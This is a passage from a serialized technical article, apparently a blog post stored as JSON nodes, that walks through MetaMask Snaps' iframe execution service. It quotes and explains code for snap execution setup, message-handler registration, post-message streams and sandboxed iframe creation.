setupSnapProvider:",{"type":28,"tag":116,"props":35399,"children":35400},{"style":376},[35401],{"type":33,"value":35342},{"type":28,"tag":116,"props":35403,"children":35404},{"style":266},[35405],{"type":33,"value":141},{"type":28,"tag":116,"props":35407,"children":35408},{"style":272},[35409],{"type":33,"value":35410},"setupSnapProvider",{"type":28,"tag":116,"props":35412,"children":35413},{"style":266},[35414],{"type":33,"value":141},{"type":28,"tag":116,"props":35416,"children":35417},{"style":282},[35418],{"type":33,"value":35419},"bind",{"type":28,"tag":116,"props":35421,"children":35422},{"style":266},[35423],{"type":33,"value":313},{"type":28,"tag":116,"props":35425,"children":35426},{"style":376},[35427],{"type":33,"value":17355},{"type":28,"tag":116,"props":35429,"children":35430},{"style":266},[35431],{"type":33,"value":6408},{"type":28,"tag":116,"props":35433,"children":35434},{"class":245,"line":665},[35435],{"type":28,"tag":116,"props":35436,"children":35437},{"style":266},[35438],{"type":33,"value":16239},{"type":28,"tag":116,"props":35440,"children":35441},{"class":245,"line":713},[35442],{"type":28,"tag":116,"props":35443,"children":35444},{"emptyLinePlaceholder":19},[35445],{"type":33,"value":1044},{"type":28,"tag":116,"props":35447,"children":35448},{"class":245,"line":750},[35449],{"type":28,"tag":116,"props":35450,"children":35451},{"style":250},[35452],{"type":33,"value":35453},"// Define IFRAME_EXECUTION_ENVIRONMENT_URL\n",{"type":28,"tag":116,"props":35455,"children":35456},{"class":245,"line":779},[35457,35461,35465,35469,35473,35477],{"type":28,"tag":116,"props":35458,"children":35459},{"style":272},[35460],{"type":33,"value":35307},{"type":28,"tag":116,"props":35462,"children":35463},{"style":266},[35464],{"type":33,"value":141},{"type":28,"tag":116,"props":35466,"children":35467},{"style":272},[35468],{"type":33,"value":35316},{"type":28,"tag":116,"props":35470,"children":35471},{"style":266},[35472],{"type":33,"value":141},{"type":28,"tag":116,"props":35474,"children":35475},{"style":272},[35476],{"type":33,"value":35325},{"type":28,"tag":116,"props":35478,"children":35479},{"style":370},[35480],{"type":33,"value":35481}," =\n",{"type":28,"tag":116,"props":35483,"children":35484},{"class":245,"line":796},[35485,35490],{"type":28,"tag":116,"props":35486,"children":35487},{"style":563},[35488],{"type":33,"value":35489},"  'https://execution.metamask.io/0.36.1-flask.1/index.html'",{"type":28,"tag":116,"props":35491,"children":35492},{"style":266},[35493],{"type":33,"value":384},{"type":28,"tag":116,"props":35495,"children":35496},{"class":245,"line":847},[35497],{"type":28,"tag":116,"props":35498,"children":35499},{"style":250},[35500],{"type":33,"value":35261},{"type":28,"tag":29,"props":35502,"children":35503},{},[35504,35506,35512,35514,35520,35522,35527],{"type":33,"value":35505},"This code is defining the ",{"type":28,"tag":98,"props":35507,"children":35509},{"className":35508},[],[35510],{"type":33,"value":35511},"snapExecutionServiceArgs",{"type":33,"value":35513}," object, which contains information required for the ",{"type":28,"tag":98,"props":35515,"children":35517},{"className":35516},[],[35518],{"type":33,"value":35519},"IframeExecutionService",{"type":33,"value":35521}," to execute snaps. The ",{"type":28,"tag":98,"props":35523,"children":35525},{"className":35524},[],[35526],{"type":33,"value":35325},{"type":33,"value":35528}," points to the location where the execution environment resides.",{"type":28,"tag":443,"props":35530,"children":35532},{"id":35531},"executing-snaps-iframeexecutionservice-in-action",[35533],{"type":33,"value":35534},"Executing Snaps: IframeExecutionService in Action",{"type":28,"tag":29,"props":35536,"children":35537},{},[35538,35540,35545,35547,35553],{"type":33,"value":35539},"Inside the snaps-controller package's IframeExecutionService.ts file, the ",{"type":28,"tag":98,"props":35541,"children":35543},{"className":35542},[],[35544],{"type":33,"value":35519},{"type":33,"value":35546}," orchestrates snap execution. Again, here's a snippet of the relevant ",{"type":28,"tag":87,"props":35548,"children":35551},{"href":35549,"rel":35550},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/AbstractExecutionService.ts#L89",[91],[35552],{"type":33,"value":98},{"type":33,"value":4160},{"type":28,"tag":234,"props":35555,"children":35559},{"className":35556,"code":35557,"language":35558,"meta":7,"style":7},"language-typescript shiki shiki-themes slack-dark","// Register message handlers for snap interactions\nthis.#messenger.registerActionHandler(\n  `${controllerName}:handleRpcRequest`,\n  async (snapId: string, options: SnapRpcHookArgs) =>\n    this.handleRpcRequest(snapId, options),\n);\n\n// More handlers for executeSnap, terminateSnap, etc.\n// ...\n\n// Execute a snap\nasync executeSnap(snapData: SnapExecutionData) {\n  // Initialize job, streams, and environment\n  const { jobId } = await this.initJob(snapData);\n  const { worker, stream } = await this.initEnvStream(jobId);\n  // ...\n}\n","typescript",[35560],{"type":28,"tag":98,"props":35561,"children":35562},{"__ignoreMap":7},[35563,35571,35600,35630,35683,35720,35727,35734,35742,35749,35756,35764,35799,35807,35863,35924,35932],{"type":28,"tag":116,"props":35564,"children":35565},{"class":245,"line":246},[35566],{"type":28,"tag":116,"props":35567,"children":35568},{"style":250},[35569],{"type":33,"value":35570},"// Register message handlers for snap interactions\n",{"type":28,"tag":116,"props":35572,"children":35573},{"class":245,"line":256},[35574,35578,35582,35587,35591,35596],{"type":28,"tag":116,"props":35575,"children":35576},{"style":376},[35577],{"type":33,"value":17355},{"type":28,"tag":116,"props":35579,"children":35580},{"style":266},[35581],{"type":33,"value":141},{"type":28,"tag":116,"props":35583,"children":35584},{"style":272},[35585],{"type":33,"value":35586},"#messenger",{"type":28,"tag":116,"props":35588,"children":35589},{"style":266},[35590],{"type":33,"value":141},{"type":28,"tag":116,"props":35592,"children":35593},{"style":282},[35594],{"type":33,"value":35595},"registerActionHandler",{"type":28,"tag":116,"props":35597,"children":35598},{"style":266},[35599],{"type":33,"value":3133},{"type":28,"tag":116,"props":35601,"children":35602},{"class":245,"line":293},[35603,35608,35612,35617,35621,35626],{"type":28,"tag":116,"props":35604,"children":35605},{"style":563},[35606],{"type":33,"value":35607},"  `",{"type":28,"tag":116,"props":35609,"children":35610},{"style":376},[35611],{"type":33,"value":867},{"type":28,"tag":116,"props":35613,"children":35614},{"style":272},[35615],{"type":33,"value":35616},"controllerName",{"type":28,"tag":116,"props":35618,"children":35619},{"style":376},[35620],{"type":33,"value":885},{"type":28,"tag":116,"props":35622,"children":35623},{"style":563},[35624],{"type":33,"value":35625},":handleRpcRequest`",{"type":28,"tag":116,"props":35627,"children":35628},{"style":266},[35629],{"type":33,"value":3178},{"type":28,"tag":116,"props":35631,"children":35632},{"class":245,"line":361},[35633,35638,35642,35647,35651,35656,35660,35665,35669,35674,35678],{"type":28,"tag":116,"props":35634,"children":35635},{"style":376},[35636],{"type":33,"value":35637},"  async",{"type":28,"tag":116,"props":35639,"children":35640},{"style":266},[35641],{"type":33,"value":269},{"type":28,"tag":116,"props":35643,"children":35644},{"style":272},[35645],{"type":33,"value":35646},"snapId",{"type":28,"tag":116,"props":35648,"children":35649},{"style":370},[35650],{"type":33,"value":4160},{"type":28,"tag":116,"props":35652,"children":35653},{"style":339},[35654],{"type":33,"value":35655}," string",{"type":28,"tag":116,"props":35657,"children":35658},{"style":266},[35659],{"type":33,"value":825},{"type":28,"tag":116,"props":35661,"children":35662},{"style":272},[35663],{"type":33,"value":35664},"options",{"type":28,"tag":116,"props":35666,"children":35667},{"style":370},[35668],{"type":33,"value":4160},{"type":28,"tag":116,"props":35670,"children":35671},{"style":339},[35672],{"type":33,"value":35673}," SnapRpcHookArgs",{"type":28,"tag":116,"props":35675,"children":35676},{"style":266},[35677],{"type":33,"value":1609},{"type":28,"tag":116,"props":35679,"children":35680},{"style":376},[35681],{"type":33,"value":35682},"=>\n",{"type":28,"tag":116,"props":35684,"children":35685},{"class":245,"line":387},[35686,35691,35695,35700,35704,35708,35712,35716],{"type":28,"tag":116,"props":35687,"children":35688},{"style":376},[35689],{"type":33,"value":35690},"    this",{"type":28,"tag":116,"props":35692,"children":35693},{"style":266},[35694],{"type":33,"value":141},{"type":28,"tag":116,"props":35696,"children":35697},{"style":282},[35698],{"type":33,"value":35699},"handleRpcRequest",{"type":28,"tag":116,"props":35701,"children":35702},{"style":266},[35703],{"type":33,"value":313},{"type":28,"tag":116,"props":35705,"children":35706},{"style":272},[35707],{"type":33,"value":35646},{"type":28,"tag":116,"props":35709,"children":35710},{"style":266},[35711],{"type":33,"value":825},{"type":28,"tag":116,"props":35713,"children":35714},{"style":272},[35715],{"type":33,"value":35664},{"type":28,"tag":116,"props":35717,"children":35718},{"style":266},[35719],{"type":33,"value":6408},{"type":28,"tag":116,"props":35721,"children":35722},{"class":245,"line":400},[35723],{"type":28,"tag":116,"props":35724,"children":35725},{"style":266},[35726],{"type":33,"value":895},{"type":28,"tag":116,"props":35728,"children":35729},{"class":245,"line":614},[35730],{"type":28,"tag":116,"props":35731,"children":35732},{"emptyLinePlaceholder":19},[35733],{"type":33,"value":1044},{"type":28,"tag":116,"props":35735,"children":35736},{"class":245,"line":631},[35737],{"type":28,"tag":116,"props":35738,"children":35739},{"style":250},[35740],{"type":33,"value":35741},"// More handlers for executeSnap, terminateSnap, etc.\n",{"type":28,"tag":116,"props":35743,"children":35744},{"class":245,"line":665},[35745],{"type":28,"tag":116,"props":35746,"children":35747},{"style":250},[35748],{"type":33,"value":35261},{"type":28,"tag":116,"props":35750,"children":35751},{"class":245,"line":713},[35752],{"type":28,"tag":116,"props":35753,"children":35754},{"emptyLinePlaceholder":19},[35755],{"type":33,"value":1044},{"type":28,"tag":116,"props":35757,"children":35758},{"class":245,"line":750},[35759],{"type":28,"tag":116,"props":35760,"children":35761},{"style":250},[35762],{"type":33,"value":35763},"// Execute a snap\n",{"type":28,"tag":116,"props":35765,"children":35766},{"class":245,"line":779},[35767,35772,35777,35781,35786,35790,35795],{"type":28,"tag":116,"props":35768,"children":35769},{"style":272},[35770],{"type":33,"value":35771},"async",{"type":28,"tag":116,"props":35773,"children":35774},{"style":282},[35775],{"type":33,"value":35776}," executeSnap",{"type":28,"tag":116,"props":35778,"children":35779},{"style":266},[35780],{"type":33,"value":313},{"type":28,"tag":116,"props":35782,"children":35783},{"style":272},[35784],{"type":33,"value":35785},"snapData",{"type":28,"tag":116,"props":35787,"children":35788},{"style":266},[35789],{"type":33,"value":14994},{"type":28,"tag":116,"props":35791,"children":35792},{"style":272},[35793],{"type":33,"value":35794},"SnapExecutionData",{"type":28,"tag":116,"props":35796,"children":35797},{"style":266},[35798],{"type":33,"value":844},{"type":28,"tag":116,"props":35800,"children":35801},{"class":245,"line":796},[35802],{"type":28,"tag":116,"props":35803,"children":35804},{"style":250},[35805],{"type":33,"value":35806},"  // Initialize job, streams, and environment\n",{"type":28,"tag":116,"props":35808,"children":35809},{"class":245,"line":847},[35810,35815,35819,35824,35829,35833,35838,35842,35846,35851,35855,35859],{"type":28,"tag":116,"props":35811,"children":35812},{"style":376},[35813],{"type":33,"value":35814},"  const",{"type":28,"tag":116,"props":35816,"children":35817},{"style":266},[35818],{"type":33,"value":9254},{"type":28,"tag":116,"props":35820,"children":35821},{"style":272},[35822],{"type":33,"value":35823},"jobId",{"type":28,"tag":116,"props":35825,"children":35826},{"style":266},[35827],{"type":33,"value":35828}," } ",{"type":28,"tag":116,"props":35830,"children":35831},{"style":370},[35832],{"type":33,"value":373},{"type":28,"tag":116,"props":35834,"children":35835},{"style":260},[35836],{"type":33,"value":35837}," await",{"type":28,"tag":116,"props":35839,"children":35840},{"style":376},[35841],{"type":33,"value":35342},{"type":28,"tag":116,"props":35843,"children":35844},{"style":266},[35845],{"type":33,"value":141},{"type":28,"tag":116,"props":35847,"children":35848},{"style":282},[35849],{"type":33,"value":35850},"initJob",{"type":28,"tag":116,"props":35852,"children":35853},{"style":266},[35854],{"type":33,"value":313},{"type":28,"tag":116,"props":35856,"children":35857},{"style":272},[35858],{"type":33,"value":35785},{"type":28,"tag":116,"props":35860,"children":35861},{"style":266},[35862],{"type":33,"value":895},{"type":28,"tag":116,"props":35864,"children":35865},{"class":245,"line":898},[35866,35870,35874,35879,35883,35887,35891,35895,35899,35903,35907,35912,35916,35920],{"type":28,"tag":116,"props":35867,"children":35868},{"style":376},[35869],{"type":33,"value":35814},{"type":28,"tag":116,"props":35871,"children":35872},{"style":266},[35873],{"type":33,"value":9254},{"type":28,"tag":116,"props":35875,"children":35876},{"style":272},[35877],{"type":33,"value":35878},"worker",{"type":28,"tag":116,"props":35880,"children":35881},{"style":266},[35882],{"type":33,"value":825},{"type":28,"tag":116,"props":35884,"children":35885},{"style":272},[35886],{"type":33,"value":1205},{"type":28,"tag":116,"props":35888,"children":35889},{"style":266},[35890],{"type":33,"value":35828},{"type":28,"tag":116,"props":35892,"children":35893},{"style":370},[35894],{"type":33,"value":373},{"type":28,"tag":116,"props":35896,"children":35897},{"style":260},[35898],{"type":33,"value":35837},{"type":28,"tag":116,"props":35900,"children":35901},{"style":376},[35902],{"type":33,"value":35342},{"type":28,"tag":116,"props":35904,"children":35905},{"style":266},[35906],{"type":33,"value":141},{"type":28,"tag":116,"props":35908,"children":35909},{"style":282},[35910],{"type":33,"value":35911},"initEnvStream",{"type":28,"tag":116,"props":35913,"children":35914},{"style":266},[35915],{"type":33,"value":313},{"type":28,"tag":116,"props":35917,"children":35918},{"style":272},[35919],{"type":33,"value":35823},{"type":28,"tag":116,"props":35921,"children":35922},{"style":266},[35923],{"type":33,"value":895},{"type":28,"tag":116,"props":35925,"children":35926},{"class":245,"line":907},[35927],{"type":28,"tag":116,"props":35928,"children":35929},{"style":250},[35930],{"type":33,"value":35931},"  // ...\n",{"type":28,"tag":116,"props":35933,"children":35934},{"class":245,"line":981},[35935],{"type":28,"tag":116,"props":35936,"children":35937},{"style":266},[35938],{"type":33,"value":406},{"type":28,"tag":29,"props":35940,"children":35941},{},[35942,35943,35948,35950,35956],{"type":33,"value":16275},{"type":28,"tag":98,"props":35944,"children":35946},{"className":35945},[],[35947],{"type":33,"value":35519},{"type":33,"value":35949}," registers message handlers that facilitate communication between Metamask and snaps within the iFrame. The ",{"type":28,"tag":98,"props":35951,"children":35953},{"className":35952},[],[35954],{"type":33,"value":35955},"${controllerName}:executeSnap",{"type":33,"value":35957}," handler triggers the snap execution process.",{"type":28,"tag":443,"props":35959,"children":35961},{"id":35960},"step-by-step-execution-from-initialization-to-iframe-creation",[35962,35964],{"type":33,"value":35963},"Step-by-Step Execution: From Initialization to iFrame ",{"type":28,"tag":87,"props":35965,"children":35968},{"href":35966,"rel":35967},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/iframe/IframeExecutionService.ts#L31",[91],[35969],{"type":33,"value":35970},"creation",{"type":28,"tag":234,"props":35972,"children":35974},{"className":35556,"code":35973,"language":35558,"meta":7,"style":7},"protected async initEnvStream(jobId: string): Promise\u003C{\n    worker: Window;\n    stream: BasePostMessageStream;\n  }> {\n    const iframeWindow = await createWindow(this.iframeUrl.toString(), jobId);\n\n    const stream = new WindowPostMessageStream({\n      name: 'parent',\n      target: 'child',\n      targetWindow: iframeWindow,\n      targetOrigin: '*',\n    });\n\n    return { worker: iframeWindow, stream };\n  }\n",[35975],{"type":28,"tag":98,"props":35976,"children":35977},{"__ignoreMap":7},[35978,36027,36048,36069,36077,36141,36148,36176,36193,36210,36227,36244,36251,36258,36282],{"type":28,"tag":116,"props":35979,"children":35980},{"class":245,"line":246},[35981,35986,35991,35996,36000,36004,36008,36012,36017,36022],{"type":28,"tag":116,"props":35982,"children":35983},{"style":272},[35984],{"type":33,"value":35985},"protected",{"type":28,"tag":116,"props":35987,"children":35988},{"style":272},[35989],{"type":33,"value":35990}," async",{"type":28,"tag":116,"props":35992,"children":35993},{"style":282},[35994],{"type":33,"value":35995}," initEnvStream",{"type":28,"tag":116,"props":35997,"children":35998},{"style":266},[35999],{"type":33,"value":313},{"type":28,"tag":116,"props":36001,"children":36002},{"style":272},[36003],{"type":33,"value":35823},{"type":28,"tag":116,"props":36005,"children":36006},{"style":266},[36007],{"type":33,"value":14994},{"type":28,"tag":116,"props":36009,"children":36010},{"style":272},[36011],{"type":33,"value":29322},{"type":28,"tag":116,"props":36013,"children":36014},{"style":266},[36015],{"type":33,"value":36016},"): ",{"type":28,"tag":116,"props":36018,"children":36019},{"style":339},[36020],{"type":33,"value":36021},"Promise",{"type":28,"tag":116,"props":36023,"children":36024},{"style":266},[36025],{"type":33,"value":36026},"\u003C{\n",{"type":28,"tag":116,"props":36028,"children":36029},{"class":245,"line":256},[36030,36035,36039,36044],{"type":28,"tag":116,"props":36031,"children":36032},{"style":272},[36033],{"type":33,"value":36034},"    worker",{"type":28,"tag":116,"props":36036,"children":36037},{"style":370},[36038],{"type":33,"value":4160},{"type":28,"tag":116,"props":36040,"children":36041},{"style":339},[36042],{"type":33,"value":36043}," Window",{"type":28,"tag":116,"props":36045,"children":36046},{"style":266},[36047],{"type":33,"value":384},{"type":28,"tag":116,"props":36049,"children":36050},{"class":245,"line":293},[36051,36056,36060,36065],{"type":28,"tag":116,"props":36052,"children":36053},{"style":272},[36054],{"type":33,"value":36055},"    stream",{"type":28,"tag":116,"props":36057,"children":36058},{"style":370},[36059],{"type":33,"value":4160},{"type":28,"tag":116,"props":36061,"children":36062},{"style":339},[36063],{"type":33,"value":36064}," BasePostMessageStream",{"type":28,"tag":116,"props":36066,"children":36067},{"style":266},[36068],{"type":33,"value":384},{"type":28,"tag":116,"props":36070,"children":36071},{"class":245,"line":361},[36072],{"type":28,"tag":116,"props":36073,"children":36074},{"style":266},[36075],{"type":33,"value":36076},"  }> {\n",{"type":28,"tag":116,"props":36078,"children":36079},{"class":245,"line":387},[36080,36085,36090,36094,36098,36103,36107,36111,36115,36120,36124,36129,36133,36137],{"type":28,"tag":116,"props":36081,"children":36082},{"style":266},[36083],{"type":33,"value":36084},"    const ",{"type":28,"tag":116,"props":36086,"children":36087},{"style":272},[36088],{"type":33,"value":36089},"iframeWindow",{"type":28,"tag":116,"props":36091,"children":36092},{"style":370},[36093],{"type":33,"value":2226},{"type":28,"tag":116,"props":36095,"children":36096},{"style":260},[36097],{"type":33,"value":35837},{"type":28,"tag":116,"props":36099,"children":36100},{"style":282},[36101],{"type":33,"value":36102}," createWindow",{"type":28,"tag":116,"props":36104,"children":36105},{"style":266},[36106],{"type":33,"value":313},{"type":28,"tag":116,"props":36108,"children":36109},{"style":376},[36110],{"type":33,"value":17355},{"type":28,"tag":116,"props":36112,"children":36113},{"style":266},[36114],{"type":33,"value":141},{"type":28,"tag":116,"props":36116,"children":36117},{"style":272},[36118],{"type":33,"value":36119},"iframeUrl",{"type":28,"tag":116,"props":36121,"children":36122},{"style":266},[36123],{"type":33,"value":141},{"type":28,"tag":116,"props":36125,"children":36126},{"style":282},[36127],{"type":33,"value":36128},"toString",{"type":28,"tag":116,"props":36130,"children":36131},{"style":266},[36132],{"type":33,"value":18038},{"type":28,"tag":116,"props":36134,"children":36135},{"style":272},[36136],{"type":33,"value":35823},{"type":28,"tag":116,"props":36138,"children":36139},{"style":266},[36140],{"type":33,"value":895},{"type":28,"tag":116,"props":36142,"children":36143},{"class":245,"line":400},[36144],{"type":28,"tag":116,"props":36145,"children":36146},{"emptyLinePlaceholder":19},[36147],{"type":33,"value":1044},{"type":28,"tag":116,"props":36149,"children":36150},{"class":245,"line":614},[36151,36155,36159,36163,36167,36172],{"type":28,"tag":116,"props":36152,"children":36153},{"style":266},[36154],{"type":33,"value":36084},{"type":28,"tag":116,"props":36156,"children":36157},{"style":272},[36158],{"type":33,"value":1205},{"type":28,"tag":116,"props":36160,"children":36161},{"style":370},[36162],{"type":33,"value":2226},{"type":28,"tag":116,"props":36164,"children":36165},{"style":376},[36166],{"type":33,"value":31582},{"type":28,"tag":116,"props":36168,"children":36169},{"style":282},[36170],{"type":33,"value":36171}," WindowPostMessageStream",{"type":28,"tag":116,"props":36173,"children":36174},{"style":266},[36175],{"type":33,"value":14803},{"type":28,"tag":116,"props":36177,"children":36178},{"class":245,"line":631},[36179,36184,36189],{"type":28,"tag":116,"props":36180,"children":36181},{"style":272},[36182],{"type":33,"value":36183},"      name:",{"type":28,"tag":116,"props":36185,"children":36186},{"style":563},[36187],{"type":33,"value":36188}," 'parent'",{"type":28,"tag":116,"props":36190,"children":36191},{"style":266},[36192],{"type":33,"value":3178},{"type":28,"tag":116,"props":36194,"children":36195},{"class":245,"line":665},[36196,36201,36206],{"type":28,"tag":116,"props":36197,"children":36198},{"style":272},[36199],{"type":33,"value":36200},"      target:",{"type":28,"tag":116,"props":36202,"children":36203},{"style":563},[36204],{"type":33,"value":36205}," 'child'",{"type":28,"tag":116,"props":36207,"children":36208},{"style":266},[36209],{"type":33,"value":3178},{"type":28,"tag":116,"props":36211,"children":36212},{"class":245,"line":713},[36213,36218,36223],{"type":28,"tag":116,"props":36214,"children":36215},{"style":272},[36216],{"type":33,"value":36217},"      targetWindow:",{"type":28,"tag":116,"props":36219,"children":36220},{"style":272},[36221],{"type":33,"value":36222}," iframeWindow",{"type":28,"tag":116,"props":36224,"children":36225},{"style":266},[36226],{"type":33,"value":3178},{"type":28,"tag":116,"props":36228,"children":36229},{"class":245,"line":750},[36230,36235,36240],{"type":28,"tag":116,"props":36231,"children":36232},{"style":272},[36233],{"type":33,"value":36234},"      targetOrigin:",{"type":28,"tag":116,"props":36236,"children":36237},{"style":563},[36238],{"type":33,"value":36239}," '*'",{"type":28,"tag":116,"props":36241,"children":36242},{"style":266},[36243],{"type":33,"value":3178},{"type":28,"tag":116,"props":36245,"children":36246},{"class":245,"line":779},[36247],{"type":28,"tag":116,"props":36248,"children":36249},{"style":266},[36250],{"type":33,"value":31905},{"type":28,"tag":116,"props":36252,"children":36253},{"class":245,"line":796},[36254],{"type":28,"tag":116,"props":36255,"children":36256},{"emptyLinePlaceholder":19},[36257],{"type":33,"value":1044},{"type":28,"tag":116,"props":36259,"children":36260},{"class":245,"line":847},[36261,36266,36270,36274,36278],{"type":28,"tag":116,"props":36262,"children":36263},{"style":266},[36264],{"type":33,"value":36265},"    return { worker: ",{"type":28,"tag":116,"props":36267,"children":36268},{"style":272},[36269],{"type":33,"value":36089},{"type":28,"tag":116,"props":36271,"children":36272},{"style":266},[36273],{"type":33,"value":825},{"type":28,"tag":116,"props":36275,"children":36276},{"style":272},[36277],{"type":33,"value":1205},{"type":28,"tag":116,"props":36279,"children":36280},{"style":266},[36281],{"type":33,"value":17962},{"type":28,"tag":116,"props":36283,"children":36284},{"class":245,"line":898},[36285],{"type":28,"tag":116,"props":36286,"children":36287},{"style":266},[36288],{"type":33,"value":5543},{"type":28,"tag":29,"props":36290,"children":36291},{},[36292,36294,36300,36302,36309],{"type":33,"value":36293},"Here the iframe is created via ",{"type":28,"tag":98,"props":36295,"children":36297},{"className":36296},[],[36298],{"type":33,"value":36299},"createWindow",{"type":33,"value":36301},", which is defined in snaps-utils ",{"type":28,"tag":87,"props":36303,"children":36306},{"href":36304,"rel":36305},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-utils/src/iframe.ts#L17",[91],[36307],{"type":33,"value":36308},"package",{"type":33,"value":4160},{"type":28,"tag":234,"props":36311,"children":36313},{"className":35556,"code":36312,"language":35558,"meta":7,"style":7},"const iframe = document.createElement('iframe');\n    iframe.setAttribute('id', id);\n    iframe.setAttribute('data-testid', 'snaps-iframe');\n\n    if (sandbox) {\n      iframe.setAttribute('sandbox', 'allow-scripts');\n    }\n    iframe.setAttribute('src', uri);\n    document.body.appendChild(iframe);\n",[36314],{"type":28,"tag":98,"props":36315,"children":36316},{"__ignoreMap":7},[36317,36359,36397,36434,36441,36461,36499,36506,36543],{"type":28,"tag":116,"props":36318,"children":36319},{"class":245,"line":246},[36320,36324,36329,36333,36338,36342,36346,36350,36355],{"type":28,"tag":116,"props":36321,"children":36322},{"style":376},[36323],{"type":33,"value":9323},{"type":28,"tag":116,"props":36325,"children":36326},{"style":272},[36327],{"type":33,"value":36328}," iframe",{"type":28,"tag":116,"props":36330,"children":36331},{"style":370},[36332],{"type":33,"value":2226},{"type":28,"tag":116,"props":36334,"children":36335},{"style":272},[36336],{"type":33,"value":36337}," document",{"type":28,"tag":116,"props":36339,"children":36340},{"style":266},[36341],{"type":33,"value":141},{"type":28,"tag":116,"props":36343,"children":36344},{"style":282},[36345],{"type":33,"value":1165},{"type":28,"tag":116,"props":36347,"children":36348},{"style":266},[36349],{"type":33,"value":313},{"type":28,"tag":116,"props":36351,"children":36352},{"style":563},[36353],{"type":33,"value":36354},"'iframe'",{"type":28,"tag":116,"props":36356,"children":36357},{"style":266},[36358],{"type":33,"value":895},{"type":28,"tag":116,"props":36360,"children":36361},{"class":245,"line":256},[36362,36367,36371,36376,36380,36385,36389,36393],{"type":28,"tag":116,"props":36363,"children":36364},{"style":272},[36365],{"type":33,"value":36366},"    iframe",{"type":28,"tag":116,"props":36368,"children":36369},{"style":266},[36370],{"type":33,"value":141},{"type":28,"tag":116,"props":36372,"children":36373},{"style":282},[36374],{"type":33,"value":36375},"setAttribute",{"type":28,"tag":116,"props":36377,"children":36378},{"style":266},[36379],{"type":33,"value":313},{"type":28,"tag":116,"props":36381,"children":36382},{"style":563},[36383],{"type":33,"value":36384},"'id'",{"type":28,"tag":116,"props":36386,"children":36387},{"style":266},[36388],{"type":33,"value":825},{"type":28,"tag":116,"props":36390,"children":36391},{"style":272},[36392],{"type":33,"value":3156},{"type":28,"tag":116,"props":36394,"children":36395},{"style":266},[36396],{"type":33,"value":895},{"type":28,"tag":116,"props":36398,"children":36399},{"class":245,"line":293},[36400,36404,36408,36412,36416,36421,36425,36430],{"type":28,"tag":116,"props":36401,"children":36402},{"style":272},[36403],{"type":33,"value":36366},{"type":28,"tag":116,"props":36405,"children":36406},{"style":266},[36407],{"type":33,"value":141},{"type":28,"tag":116,"props":36409,"children":36410},{"style":282},[36411],{"type":33,"value":36375},{"type":28,"tag":116,"props":36413,"children":36414},{"style":266},[36415],{"type":33,"value":313},{"type":28,"tag":116,"props":36417,"children":36418},{"style":563},[36419],{"type":33,"value":36420},"'data-testid'",{"type":28,"tag":116,"props":36422,"children":36423},{"style":266},[36424],{"type":33,"value":825},{"type":28,"tag":116,"props":36426,"children":36427},{"style":563},[36428],{"type":33,"value":36429},"'snaps-iframe'",{"type":28,"tag":116,"props":36431,"children":36432},{"style":266},[36433],{"type":33,"value":895},{"type":28,"tag":116,"props":36435,"children":36436},{"class":245,"line":361},[36437],{"type":28,"tag":116,"props":36438,"children":36439},{"emptyLinePlaceholder":19},[36440],{"type":33,"value":1044},{"type":28,"tag":116,"props":36442,"children":36443},{"class":245,"line":387},[36444,36448,36452,36457],{"type":28,"tag":116,"props":36445,"children":36446},{"style":260},[36447],{"type":33,"value":11947},{"type":28,"tag":116,"props":36449,"children":36450},{"style":266},[36451],{"type":33,"value":269},{"type":28,"tag":116,"props":36453,"children":36454},{"style":272},[36455],{"type":33,"value":36456},"sandbox",{"type":28,"tag":116,"props":36458,"children":36459},{"style":266},[36460],{"type":33,"value":844},{"type":28,"tag":116,"props":36462,"children":36463},{"class":245,"line":400},[36464,36469,36473,36477,36481,36486,36490,36495],{"type":28,"tag":116,"props":36465,"children":36466},{"style":272},[36467],{"type":33,"value":36468},"      iframe",{"type":28,"tag":116,"props":36470,"children":36471},{"style":266},[36472],{"type":33,"value":141},{"type":28,"tag":116,"props":36474,"children":36475},{"style":282},[36476],{"type":33,"value":36375},{"type":28,"tag":116,"props":36478,"children":36479},{"style":266},[36480],{"type":33,"value":313},{"type":28,"tag":116,"props":36482,"children":36483},{"style":563},[36484],{"type":33,"value":36485},"'sandbox'",{"type":28,"tag":116,"props":36487,"children":36488},{"style":266},[36489],{"type":33,"value":825},{"type":28,"tag":116,"props":36491,"children":36492},{"style":563},[36493],{"type":33,"value":36494},"'allow-scripts'",{"type":28,"tag":116,"props":36496,"children":36497},{"style":266},[36498],{"type":33,"value":895},{"type":28,"tag":116,"props":36500,"children":36501},{"class":245,"line":614},[36502],{"type":28,"tag":116,"props":36503,"children":36504},{"style":266},[36505],{"type":33,"value":3025},{"type":28,"tag":116,"props":36507,"children":36508},{"class":245,"line":631},[36509,36513,36517,36521,36525,36530,36534,36539],{"type":28,"tag":116,"props":36510,"children":36511},{"style":272},[36512],{"type":33,"value":36366},{"type":28,"tag":116,"props":36514,"children":36515},{"style":266},[36516],{"type":33,"value":141},{"type":28,"tag":116,"props":36518,"children":36519},{"style":282},[36520],{"type":33,"value":36375},{"type":28,"tag":116,"props":36522,"children":36523},{"style":266},[36524],{"type":33,"value":313},{"type":28,"tag":116,"props":36526,"children":36527},{"style":563},[36528],{"type":33,"value":36529},"'src'",{"type":28,"tag":116,"props":36531,"children":36532},{"style":266},[36533],{"type":33,"value":825},{"type":28,"tag":116,"props":36535,"children":36536},{"style":272},[36537],{"type":33,"value":36538},"uri",{"type":28,"tag":116,"props":36540,"children":36541},{"style":266},[36542],{"type":33,"value":895},{"type":28,"tag":116,"props":36544,"children":36545},{"class":245,"line":665},[36546,36550,36554,36558,36562,36567,36571,36576],{"type":28,"tag":116,"props":36547,"children":36548},{"style":272},[36549],{"type":33,"value":34303},{"type":28,"tag":116,"props":36551,"children":36552},{"style":266},[36553],{"type":33,"value":141},{"type":28,"tag":116,"props":36555,"children":36556},{"style":272},[36557],{"type":33,"value":624},{"type":28,"tag":116,"props":36559,"children":36560},{"style":266},[36561],{"type":33,"value":141},{"type":28,"tag":116,"props":36563,"children":36564},{"style":282},[36565],{"type":33,"value":36566},"appendChild",{"type":28,"tag":116,"props":36568,"children":36569},{"style":266},[36570],{"type":33,"value":313},{"type":28,"tag":116,"props":36572,"children":36573},{"style":272},[36574],{"type":33,"value":36575},"iframe",{"type":28,"tag":116,"props":36577,"children":36578},{"style":266},[36579],{"type":33,"value":895},{"type":28,"tag":29,"props":3